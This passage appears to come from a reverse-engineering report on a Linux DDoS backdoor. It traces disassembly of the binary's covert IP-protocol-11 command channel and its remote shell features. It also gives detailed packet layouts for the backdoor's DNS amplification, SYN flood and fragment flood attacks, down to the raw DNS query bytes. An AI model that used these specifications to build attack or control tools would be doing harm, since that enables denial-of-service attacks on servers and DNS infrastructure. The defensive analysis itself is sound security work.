0x8048fef: movb 0x1(%edi),%al
0x8048ff2: movb %al,0xd(%esi)
0x8048ff5: movb 0x2(%edi),%al
0x8048ff8: movb %al,0xe(%esi)
0x8048ffb: movb 0x3(%edi),%al
0x8048ffe: movb %al,0xf(%esi)
This makes the 4 bytes (length of an IP address) be copied from this
buffer to a buffer starting at 0xc(%esi). We do it all over again:
0x8049001: movb (%ebx),%al
0x8049003: movb %al,0x10(%esi)
0x8049006: movb 0x1(%ebx),%al
0x8049009: movb %al,0x11(%esi)
0x804900c: movb 0x2(%ebx),%al
0x804900f: movb %al,0x12(%esi)
0x8049012: movb 0x3(%ebx),%al
0x8049015: movb %al,0x13(%esi)
A quick look back at 0x8048f9d shows that %ebx should be equal to
*0xc(%ebp) (BufferA). Once again, more memory copying takes place,
continuing on from earlier.
A long setup and call is done:
0x8049018: movzbl 0x3(%ebx),%eax
0x804901c: pushl %eax
0x804901d: movzbl 0x2(%ebx),%eax
0x8049021: pushl %eax
0x8049022: movzbl 0x1(%ebx),%eax
0x8049026: pushl %eax
0x8049027: movzbl (%ebx),%eax
0x804902a: pushl %eax
0x804902b: pushl $0x806768a
0x8049030: leal 0xffffffd0(%ebp),%ebx
0x8049033: pushl %ebx
0x8049034: call 0x804f808
This code has been seen before, and simply uses sprintf() to form a
dotted quad located at 0xffffffd0(%ebp). The octets for this are taken
from a single buffer (thats something new), BufferA.
0x8049039: pushl %ebx
0x804903a: call 0x8049138
This function is unknown but looks to contain calls to gethostbyname()
and a data copying function that was seen earlier. Following a
successful gethostbyname() chain through the call shows it to return the
first IP address matching the hostname in the parameter. One must
question why this function is used here where a simple inet_addr() would
suffice (as had been done in earlier functions).
The return is copied:
0x804903f: movl %eax,0xfffffff4(%ebp)
And some more values are placed nearby:
0x8049042: movw $0xa,0xfffffff2(%ebp)
0x8049048: movw $0x2,0xfffffff0(%ebp)
This could well be a sock_addr structure, if the port was set to 0xa?
Now the old favourites show their faces:
0x804904e: movb $0x45,(%esi)
0x8049051: movb $0xfa,0x8(%esi)
0x8049055: movb $0xb,0x9(%esi)
%esi was earlier set to the return by a function call to 0x805bd74. It
is quite possible this function was some kind of malloc(or even malloc
itself!). Whatever it was, it would appear a packer buffer is being
created, starting at %esi. Firstly, we see the well known 0x45 IP
version / internet header length combination placed at the start. This
is followed by 0xfa being placed in the IP TTL section. Following this,
the IP protocol is set to 0xb (11). This is the same protocol that was
listened to in the main() section of this binary.
More packet setup:
0x804905c: movw 0x14(%ebp),%ax
0x8049060: addw $0x16,%ax
0x8049064: xchgb %al,%ah
0x8049066: movw %ax,0x2(%esi)
This places the value from DataAmount + 0x16, after being htons()'d,
into total length field of the IP header.
0x804906a: movb $0x0,0x1(%esi)
0 is placed into the IP TOS field.
random() is called, the return xchg()'d:
0x804906e: call 0x8056058
0x8049073: xchgb %al,%ah
0x8049075: movw %ax,0x4(%esi)
And finally added into the IP ID field.
0x8049079: movw $0x0,0x6(%esi)
0x804907f: movw $0x0,0xa(%esi)
The IP offset is set to 0, same with the checksum.
Starting at 0x8049085, checksum code appears to be started, looping
across 20 bytes (the ip header). Eventually:
0x80490cf: movw %ax,0xa(%edi)
The checksum is put into place, followed by:
0x80490d3: movl 0xffffffc0(%ebp),%edi
0x80490d6: movb $0x3,(%edi)
0xffffffc0(%ebp) is referenced much earlier, and was set to an offset of
0x14 bytes from %edi would have been above. This means this would
correspond to directly after the IP header. A value of 0x3 is placed
into this position.
A function is setup and called:
0x80490d9: movl 0x14(%ebp),%edi
0x80490dc: pushl %edi
0x80490dd: movl 0x10(%ebp),%edi
0x80490e0: pushl %edi
0x80490e1: movl 0xffffffc8(%ebp),%edi
0x80490e4: pushl %edi
0x80490e5: call 0x805652c
Once again, 0x805652c is a call to some kind of data copy function.
Using a previous analysis of it, DataAmount bytes would be copied from
BufferB to *0xffffffc8(%ebp). The destination was earlier set to
0x16(%esi), which corresponds to 2 bytes after the IP header.
With the data copied, it seems a sendto() is next:
0x80490ed: pushl $0x10
0x80490ef: leal 0xfffffff0(%ebp),%eax
0x80490f2: pushl %eax
0x80490f3: pushl $0x0
0x80490f5: movl 0x14(%ebp),%eax
0x80490f8: addl $0x16,%eax
0x80490fb: pushl %eax
0x80490fc: pushl %esi
0x80490fd: movl 0xffffffbc(%ebp),%edi
0x8049100: pushl %edi
0x8049101: call 0x8056c3c
0xffffffbc(%ebp) is a stored copy of the socket() return earlier.
%esi is obviously the beginning of the packet buffer.
DataAmount + 0x16 (IP header + 2) is used as the amount of data to send.
And finally, 0xfffffff0(%ebp) turns out to indeed be a sock_addr
structure as initially believed.
The return from sendto() is examined:
0x8049109: cmpl $0xffffffff,%eax
0x804910c: jne 0x8049118
If it was -1 (error):
0x804910e: pushl %esi
0x804910f: call 0x805c290
0x8049114: xorl %eax,%eax
0x8049116: jmp 0x804912c
Else:
0x8049118: movl 0xffffffbc(%ebp),%edi
0x804911b: pushl %edi
0x804911c: call 0x8057160
0x8049121: pushl %esi
0x8049122: call 0x805c290
0x8049127: movl $0x1,%eax
The calls to 0x805c290 are unknown, but given the assumption of a malloc
or derivative being used before to return %esi, it is quite likely that
this call is a free(). 0x8057160 is a close() call, done on the socket
descriptor.
This network function then returns. It should be noted, if it returns
with %eax = 0 then an error occurred, if it is 1, it was successful.
Disassembly Review:
Finally, a simple, straight-forward network function! It would appear
that IP_Address is a pointer to a 4 byte buffer, containing the source
IP for the created packet. BufferA is a similar buffer, but with the
destination IP for the packet. BufferB is a pointer to a buffer with
DataAmount bytes to send as the contents of the packet.
It should be noted that 2 extra bytes exist between the IP header and
this "data". The first of which is set to 3, and the second of which
does not seem to be set at all. It is unclear what this byte is, or
would normally be for a sent packet.
Function Overview:
FINALLY! We have all the information to solve the many little puzzles
of this code (primarily, the first two case sections in the main()
section). This function appears to be the backchannel from this binary
to the blackhat, using covert IP protocol 11 packets.
A re-examination of the first two case sections needs to be done with
this new information. This analysis will follow this function, and is
named Re-Examination_A. The network traffic generated by this function
will be examined in Network_Analysis_B
Re-Examination_A - A look back on case sections 1 and 2 from main().
Reason: With the analysis of Network_Function_A and Network_Function_F, new
information is available which opens the doors wide on some earlier
code whose purpose could not be identified.
Code Blocks Re-examined: 0x0804835c (Case section 1 - main())
0x080483f0 (Case section 2 - main())
New information: Network_Function_A and Network_Function_F
Analysis:
0x0804835c - Case section 1.
This code is initially quite complex. The main component of this section
appears to be the creation of a buffer starting at 0xfffff800(%ebp).
Initially we see GlobalA placed into the first byte of this buffer. When
we look back through all the code, Global_A actually never gets set
anywhere! This assignment is either some kind of legacy code,
preparation for future modifications, or an error (unless someone else
can show where it is used!??!).
The next two bytes are obviously set to 1 and 7. The purpose of which is
unclear, but it is assumed to mean something to the client, perhaps an ID
for the binary, or a version.
PID_Var_B appears to be used next. This variable was used to store the
PID of any fork()'s that were running. In many cases (with the
packetting functions at least), more functions would refuse to run while
another was, all judged off PID_Var_B. The interesting thing is, if
PID_Var_B is 0, the next buffer byte is a 0, if not, it is a 1. This
*might* be some kinda of indication for the blackhat to know that their
binary is doing something (busy?).
What backs this up, is if PID_Var_B is indeed non-zero (indicating
something is happening), the next byte of this buffer is set to Global_C.
What is Global_C again? It was a global variable that was always
assigned a number which seemed to be based upon the case statement.
Effectively, if for instance case section 10 was forked out and running,
Global_C would be 10. Same goes for many of the other case sections (the
long-term ones).
This means that this buffer now contains information about the "status"
of the binary. i.e. Is it running anything, and if so, what?
The code picks up again at 0x80483a7 where it prepares to call
Data_Manipulation_Function_B. This was proven before to be an encoding
/ decoding function (in this case it looks to be used to encode).
random() is called and seems to MOD 0xc9 ensuring a value between 0 and
200. This value is then +0x190 and passed to Network_Function_A in which
it has the effect of being the amount of data bytes to send.
The first parameter passed to this function, 0xffffbb1c(%ebp) we will see
more of in case section 2 of this re-examination. It turns out, it is
used to contain the IP address(s) that Network_Function_A uses to send
off packets to. We will see how this buffer is constructed soon.
And finally, the second parameter passed to Network_Function_A,
0xffffbb20(%ebp). This buffer is the encoded data from
Data_Manipulation_Function_B. This means that the information passed by
this case section is encoded using Data_Manipulation_Function_B!
0x080483f0 - Case section 2.
This section is one of the more complex to follow, but uses simplistic
programming structures.
This section uses data from within the packet. This was already looked
at earlier. What was unknown at the time, was that the packet data would
have been encoded for network transfer. The data was then decoded and
used for this case section.
The most important part is right at the beginning. Global_B is set to
the third byte of the decoded buffer. This is an extremely important
variable. The analysis of Network_Function_A revealed that if Global_B
was 0, packets would be sent to just one IP. If Global_B was non-zero,
10 IP's would have data sent to them.
This all becomes important when one tries to work out what these IP
addresses actually are (we will definately want to know!).
The source IP for Network_Function_F is also set to the destination IP of
the packet that resulted in this case section getting executed. (This
is a pretty handy trick since it eliminates interface scouring).
Back to the destination IP addresses:
random() is called at 0x8048440, with the result MOD 0xa, and is stored
in %edi.
A loop is formed from this point down to 0x8048532. The condition for
ending the loop appears to be that 10 iterations should have happened
(probably a for-loop). The counter for each iteration is %ebx.
The first conditional within this loop is:
0x8048454: cmpl %edi,%ebx
0x8048456: je 0x804852b
Obviously, this guts of this loop will occur on all but one iteration.
That is, when %edi = %ebx. What purpose does this have? We'll soon see!
The purpose of this loop, is to set the data buffer starting at
0xffffbb1c(%ebp). This buffer was used in the previous case section (and
also in case section 3) as the destination IP(s) to pass to
Network_Function_A. In effect, this case section has the effect of the
blackhat telling the program who to call home! Global_B Also had the
effect of making Network_Function_A send 1 packet if it was 0, and 10
packets if anything else.
On all other iterations of the loop (%edi != %ebx), Global_B (set a few
lines earlier) is checked. If it is 2, it would appear that the data
from the decoded buffer is copied directly into indexed positions
starting at 0xffffbb1c(%ebp). If Global_B is anything else, the data
placed into indexed positions from 0xffffbb1c(%ebp) is randomly
generated.
What happens on that one iteration where %edi == %ebx?
If Global_B is 0, the first 4 bytes starting at 0xffffbb1c(%ebp) are set
to the first 4 bytes from 0xfffff003(%ebp). Since only one packet is
sent by Network_Function_A when Global_B is 0, this is the destination
(and most probably the place that the blackhat's client is running on)
If Global_B is 2, 9 of the 10 iterations would have copied data from
the decoded buffer (effectively allowing the blackhat to set all of
these IPs). What happens on the 10th IP (the one where %edi == %ebx)
is a mystery. It appears to be left to whatever is may have been earlier
(This could be a programming flaw on behalf of the blackhat! - Could even
lead to working out their client machine's IP).
If Global_B is anything else, the missing iteration is filled in with
the first four bytes from 0xfffff003(%ebp).
This ends this case section. The reasoning behind such a complex system
of multiple destinations for packets is obviously one of obfuscation. It
most certainly makes things extremely tough to 'prove' just who an
attacker is (notice the word prove).
Network_Analysis_A - Incoming covert communications channel.
About: This binary listens for packets matching a particular description.
Upon receiving certain packets, it will do certain actions. This
section will attempt to add some structure to be able to work out
what is occuring from network traffic.
Packet structure:
IP level:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| DDOS 1 | DDOS 2 | |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +
| |
+ COVERT DATA BUFFER +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields (Necessary):
Total Length: Must be greater than 200 (well recv() has to get more than
200 bytes, so theoretically this means the total length on
a non-corrupt packet would be > 200.
Protocol: Must be 11.
Destination Address:
This doesn't necessarily have to be anything, but it is
used as the source IP address for any outgoing covert
communications (see Network_Analysis_B)
DDOS1: This must be a 2.
DDOS2: This byte doesn't seem to be used or checked.
COVERT DATA BUFFER:
This is filled with an encoded buffer that is decoded by
Data_Manipulation_Function_A.
Covert Data Buffer decoded:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Unknown | Operation | |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ DATA BUFFER +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
This structure represents a DECODED representation of the covert data
buffer.
The data is analysed and the Operation field used to control various
actions:
Operation Field:
1: Generates a covert channel response to the blackhat which contains
the status of the binary. It could also be a covert packetting tool
but is extremely ulikely :)
2: An interesting feature of this binary is the covert packet channel.
The binary can generate a single packet to the attacker, or 10
duplicate packets to the attacker which are sent to different
destination IPs.
This operation mode tells the binary to choose between the 1 and 10,
and also has the ability to set the various destination IPs.
It should be noted that the binary has no 'preset' blackhat address.
It can only find it out through this operation.
The modes of operation are determined by the first byte of DATA
BUFFER:
0: The next four bytes will be used as the octets for a single
covert packet effect.
1: The next four bytes will be used as the octets, but will be
placed in a list with 9 other randomly generated IPs. The
position of these octets in this list appears random. 10
packets will be sent for every covert packet generated, one
to each IP.
2: IP octets are read directly from the next 40 bytes. Due to
the complexity of this code, it is unclear if a potential
error is in the code whereby one of the IP's will be skipped.
(Or this has some reason that has been overlooked?)
3: Another innovative feature, a covert 'shell' almost. /bin/csh is
called to execute a command that starts at DATA BUFFER. The output
of this is then sent back via the covert channel.
4: Calls Network_Function_B (DNS Amplification Attack)
5: Calls Network_Function_C (Corrupt packet flood)
6: Creates a password guarded bind shell.
7: Executes a command in the same manner as operation 3, except the
output is not sent back.
8: Appears to have the ability to stop any running 'packetting'
function, as well as the shell in operation 6.
9: Calls Network_Function_B (DNS Amplification Attack)
The difference between this and the earlier operation is that this
one looks to be able to adjust the speed.
10: Calls Network_Function_D (SYN packet flood)
11: Calls Network_Function_D (SYN packet flood)
The difference to the last operation appears to once again be that
this one has an adjustable speed based.
12: Calls Network_Function_E (DNS request flood)
Many of these operation fields have their own format for the rest of the
DATA BUFFER. The relative function analysis, combined with the case
sections can be used as a reference to see what the rest of the buffer
does.
Overview:
This covert communications channel has one main feature of being
undetected by many popular network monitoring utilities that only listen
on known protocols.
Communication takes place over an unconnected (and therefore spoofable)
protocol. This allows an attacker to VERY anonymously (and very quickly)
control many infected machines.
Network_Analysis_B - Outgoing covert communications channel.
About: There exists the ability to send data to the blackhat via an encoded
and covert network channel. The use of this channel seems to be
limited to seeing the 'status' of the binary, or being able to see
the output of executed commands.
Packet structure:
IP level:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| DDOS 1 | DDOS 2 | |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +
| |
+ COVERT DATA BUFFER +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: random between 422 and 622 bytes
ID: random
Flags / Fragment Offset:
0
TTL: 250 (start)
Protocol: 11
Checksum: Believed to be correct (but unchecked)
Source Address: infected machine
Destination Address:
Up to 10 addresses that can be random, or manually
set by the blackhat. The blackhat would most
probably (but by no means has to) be running a
client for this backdoor on one of these addresses.
DDOS1: 3
DDOS2: Unknown
COVERT DATA BUFFER :
Contains encoded data, as encoded by
Data_Manipulation_Function_B.
Overview:
The main feature of this channel is its ability to send 'decoy' packets
along with one to a real client. Decoy packets have often been used for
scanning networks, it now looks like they are being used in DDOS utils and
backdoors too.
Network_Analysis_C - DNS amplification attack
About: The DNS system looks to be abused by Network_Function_B. A stream of
UDP packets has been identified being sent to the DNS port of over 11
thousand IPs which are hardcoded into the binary. This has not been
proven to be an amplification attack as yet, but there is little
doubt that it will.
Packet structure:
IP level:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| UDP Source Port | UDP Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| UDP length | UDP Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| DNS ID |Q| OPCDE |A|T|R|A| Z | RCODE |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| QDCOUNT | ANCOUNT |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| NSCOUNT | ARCOUNT |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| DNS QUERY DATA |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: Between 48 and 53 bytes (depending on data)
ID: random 0-254
Flags / Fragment Offset:
0
TTL: Random 120 to 250
Protocol: 17 (UDP)
IP Checksum: Believed to be correct (but unchecked)
Source Address: Primary victim of attack
Destination Address:
One of 11441 IP's (See Appendix A)
These IP's are cycled through.
UDP Source Port: Manually set by blackhat, or random 0-30000
UDP Dest Port: 53 (DNS)
UDP Length: 28 to 33 (depending on data)
UDP Checksum: 0
DNS ID: Random
Q(Query/Resp): 0 (Query)
OPCODE: 0 (Standard Query)
A(Authorative): 0
T(Truncated): 0
R(Recursion D): 1
A(Recursion A): 0
Z: 0
RCODE: 0
QDCOUNT: 1 (1 Question)
ANCOUNT: 0
NSCOUNT: 0
ARCOUNT: 0
DNS QUERY DATA: A loop is present in the code that cycles through the
following QUERY data:
"0x03 0x63 0x6F 0x6D 0x00 0x00 0x06 0x00 0x01"
QNAME: ".com" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x6E 0x65 0x74 0x00 0x00 0x06 0x00 0x01"
QNAME: ".net" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x64 0x65 0x00 0x00 0x06 0x00 0x01"
QNAME: ".de" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01"
QNAME: ".edu" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x6F 0x72 0x67 0x00 0x00 0x06 0x00 0x01"
QNAME: ".org" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x75 0x73 0x63 0x03 0x65 0x64 0x75 0x00 0x00 0x06 0x00 0x01"
QNAME: ".usc.edu"| QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x65 0x73 0x00 0x00 0x06 0x00 0x01"
QNAME: ".es" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x67 0x72 0x00 0x00 0x06 0x00 0x01"
QNAME: ".gr" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
"0x03 0x69 0x65 0x00 0x00 0x06 0x00 0x01"
QNAME: ".ie" | QTYPE: 6 (SOA) | QCLASS: 1 (Internet)
Overview:
This function obviously creates DNS requests, and throws them off to a list
of 11441 IP's. In looking at the hostnames, it becomes quite apparant that
many of these are DNS servers. In investigating 20 of these servers
randomly, 17 gave valid responses to questions, 2 refused any query, and 1
was unreachable. This would suggest the list isn't new, or that the people
in charge of these servers have noticed attacks and have acted to block
them.
The attack is most certainly a form of bandwidth amplification attack. A
request (as seen above) is on average 41 bytes. In sniffing responses to
the above queries (generated by host -t ns QNAME), responses are roughly
500 bytes long. This means roughly 12x amplification is achieved.
Unfortunately, DNS traffic is quite difficult to filter and still maintain
normal operations, making this a difficult attack to defend against.
One thing that does stand out, is that the UDP checksum is 0. It is
unclear as to if this will remain 0 when the packet is sent out.
Network_Analysis_D - UDP / ICMP corrupt packet flood attack
About: The purpose behind the packets sent out by Network_Function_C is
unknown. The contents of these packets appears to be IP fragments
that have less data to them than the header indicates.
Packet structure:
IP level:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: 10268
ID: 1109
Flags / Fragment Offset:
Offset = 8190 (flags = 0)
TTL: Random 120 to 250
Protocol: 1(ICMP) / 17 (UDP)
IP Checksum: Believed to be correct (but unchecked)
Source Address: Can be set to a single IP, or randomised
Destination Address:
This is the primary victim of the attack.
The traffic generated by Network_Function_C can take one of two forms:
ICMP, or UDP. This is decided by the blackhat, and is not a mix.
The following are the relative 2nd layer headers:
ICMP:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Internet Header + 64 bits of Original Data Datagram |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: 8 (ICMP_ECHO)
Code: 0
Checksum: Believed to be correct (But unchecked)
UDP:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| UDP Source Port | UDP Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| UDP length | UDP Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| DATA |
+-+-+-+-+-+-+-+-+
UDP Source Port: Always random 0-254.
UDP Destination Port: Always set by the blackhat to a single port.
UDP Length: 9 (indicating 1 byte of data)
UDP Checksum: Believed to be correct (But unchecked)
Overview:
This traffic seems corrupt. This may be deliberate and attempts to
illicit error conditions, or perhaps it has some other sneaky purpose?
Run-time testing will be needed to try to understand the purpose behind
these packets.
Network_Analysis_E - SYN flood attack
About: An implementation of a SYN flooder, undoubtedly with the same purpose
that many SYN flooders have been written in the past.
Packet structure:
IP level:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Special Fields:
Version: 4
IHL: 5
TOS: 0
Total Length: 40
ID: random 0-254
Flags / Fragment Offset:
0
TTL: Random 125 to 240
Protocol: 6 (TCP)
IP Checksum: Believed to be correct (but unchecked)
Source Address: Can be set to a single IP, or randomised
Destination Address:
Primary victim of attack
TCP Source Port: Randomised between 1 and 40000
TCP Dest Port: Set by attacker to a single port
Seq Number: Random 1 to 40000000
Ack Number: 0
Data Offset: 5 (20 byte tcp header)
Flags: SYN
Window: Random 200 to 1600
TCP Checksum: Calculated off pseudo header (unchecked if correct)
Urgent Pointer: 0
Overview:
This attack has been seen many a time before, a simple SYN flooder.
Nothing particularly nasty about this one, except perhaps the
randomisation of several parts.
The destination IP is also reachable thru resolution of a hostname, which
can be relooked up every X seconds(minutes). This could be simply an ease
of use option to the blackhat, but is more likely to be for pro-longed
attacks with no interaction from the blackhat.
Network_Analysis_F - DNS request flood attack
About: This one is the most interesting (and perhaps the most serious)
attack in this binary. It is related to the DNS amplification
attack, except this time is would appear a single server is used to
generate the amplification. This would obviously cause a DoS
condition for that server (and a serious one at that).
Packet structure: Network_Analysis_C shows the types of packets that are
constructed in this attack. The differences however:
Destination IP: This is the victim.
Source IP: This source can be set by the blackhat
to a single address, or it can be
continuously randomised.
UDP Checksum: Always 0.
UDP Source Port: Can be set by blackhat, or can be
random.
Overview:
This traffic is perhaps the most important attack to analyse from the
whole binary. Primarily because enough infected machines could cause a
DoS against pretty much any public nameserver on the Internet.
Any public nameserver ofcourse includes gtld and root servers. Coupled
with the ability to specify hostnames which are periodically resolved,
this attack IS something to be worried about.
It is ofcourse nothing new, a DDOS form of this attack is something that
has been expected for a long time, as is an undoubted attack on the DNS
system.
Hopefully the blackhat(s) involved with this DDOS have not compromised
enough machines to carry out a large attack, or do not have a desire to
do it. (How long till we see a better protected DNS system put into
place? - This IS important.)
Appendix A - DNS Servers as used by Network_Function_B
The following servers are embedded within the binary for use as traffic
